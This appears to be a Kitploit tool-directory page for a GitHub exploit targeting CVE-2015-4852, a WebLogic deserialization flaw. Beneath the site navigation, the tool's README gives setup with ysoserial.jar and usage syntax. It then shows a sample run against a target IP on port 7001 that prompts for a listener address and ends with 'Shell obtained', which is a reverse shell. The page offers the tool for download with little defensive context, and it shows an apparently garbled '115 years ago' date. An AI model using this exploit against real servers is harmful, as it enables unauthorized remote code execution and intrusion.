Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2015-4852 | Kitploit
Tools/GitHubGitHub/nex1less/cve-2015-4852
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubnex1less/cve-2015-4852

CVE-2015-4852

View Repository
115 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2015-4852

Prerequisite: Place ysoserial.jar in the script directory (rename ysoserial-0*.jar to ysoserial.jar). It is best to run this script on Kali Linux.

  1. Usage:

root@kali:~# python3 CVE-2015-4852.py -h

Usage: python CVE-2015-4852.py -t/--target 1.1.1.1 7001

Options:

-h, --help show this help message and exit

-t TARGET, --target=TARGET ip port

  1. Example:

root@kali:~# python3 CVE-2015-4852.py -t 10.6.214.129 7001

Enter listener IP address: 10.6.214.1

Enter listener port: 7777

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

Execution successful

Shell obtained

Download Tool